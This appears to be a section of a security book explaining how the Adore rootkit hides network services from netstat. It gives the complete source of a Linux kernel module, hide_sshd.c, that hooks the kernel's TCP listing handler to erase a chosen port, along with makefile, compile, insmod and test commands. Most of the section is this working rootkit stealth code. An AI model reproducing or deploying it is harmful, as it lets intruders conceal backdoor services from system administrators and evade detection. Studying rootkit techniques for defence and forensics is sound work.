Team LiB
Previous Section Next Section

7.4. Hiding from netstat

The netstat tool lists currently running network services on a host:

[notroot]$ netstat -na
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address   Foreign Address  State
tcp        0      0 0.0.0.0:22      0.0.0.0:*        LISTEN
udp        0      0 0.0.0.0:68      0.0.0.0:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags     Type    State      I-Node Path
unix  2      [ ACC ]   STREAM  LISTENING  2085   /dev/gpmctl
unix  6      [ ]       DGRAM              1886   /dev/log
unix  2      [ ]       DGRAM              2153
unix  2      [ ]       DGRAM              2088
unix  2      [ ]       DGRAM              2046
unix  2      [ ]       DGRAM              1894

The Adore rootkit allows you to hide a given set of listening services from a netstat query. It does this by using the exported proc_net structure to change the tcp4_seq_show( ) handler, which is invoked by the kernel when netstat queries for listening connections. Within the hacked_tcp4_seq_show() function in hide_sshd.c, strnstr( ) is used to look in seq->buf for a substring that contains the hex representation of the port it is trying to hide, and if this is found, the string is deleted.

7.4.1. hide_sshd.c

Following is the full source code of the hide_sshd LKM:

/*Thanks to adore-ng from Stealth for the ideas used in this code*/

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/init.h>
#include <net/tcp.h>

/*from net/ipv4/tcp_ipv4.c*/
#define TMPSZ 150

/*hide sshd*/
#define PORT_TO_HIDE 22

MODULE_LICENSE("GPL");

int (*old_tcp4_seq_show)(struct seq_file*, void *) = NULL;

char *strnstr(const char *haystack, const char *needle, size_t n)
{
        char *s = strstr(haystack, needle);
        if (s == NULL)
                return NULL;
        if (s-haystack+strlen(needle) <= n)
                return s;
        else
                return NULL;
}

int hacked_tcp4_seq_show(struct seq_file *seq, void *v)
{
        int retval=old_tcp4_seq_show(seq, v);

        char port[12];

        sprintf(port,"%04X",PORT_TO_HIDE);

        if(strnstr(seq->buf+seq->count-TMPSZ,port,TMPSZ))
                seq->count -= TMPSZ;
return retval;   
}

static int __init myinit(void)
{
        struct tcp_seq_afinfo *my_afinfo = NULL;
        struct proc_dir_entry *my_dir_entry = proc_net->subdir;

        while (strcmp(my_dir_entry->name, "tcp"))
                my_dir_entry = my_dir_entry->next;

        if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry->data))
        {
                old_tcp4_seq_show = my_afinfo->seq_show;
                my_afinfo->seq_show = hacked_tcp4_seq_show;
        }
        
                
        return 0;
}
        
static void myexit(void)
{
        struct tcp_seq_afinfo *my_afinfo = NULL;
        struct proc_dir_entry *my_dir_entry = proc_net->subdir;
 
        while (strcmp(my_dir_entry->name, "tcp"))
                my_dir_entry = my_dir_entry->next;
        
        if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry->data))
        {
                my_afinfo->seq_show=old_tcp4_seq_show;
        }
                
}
                      
module_init(myinit);
module_exit(myexit);

7.4.2. Compiling and Testing hide_sshd

The hide_sshd.c source code assumes we are trying to hide the presence of sshd running on a host. If you want to hide any other service, change the value of PORT_TO_HIDE. For the purposes of this section, we assume that sshd is running on the host. Make sure by running netstat:

[notroot]$ netstat -na | grep 22
tcp     0     0.0.0.0:22    0.0.0.0:*    LISTEN

Use the following makefile:

obj-m += hide_sshd.o

Compile using the following make command:

[notroot]$ make -C /usr/src/linux-`uname -r` SUBDIRS=$PWD modules

Insert the module:

[root]# insmod ./hide_sshd.ko

Now sshd will not be visible. Try the netstat query again:

[notroot]# netstat -na | grep 22

Unload the module when done:

[root]# rmmod hide_sshd

    Team LiB
    Previous Section Next Section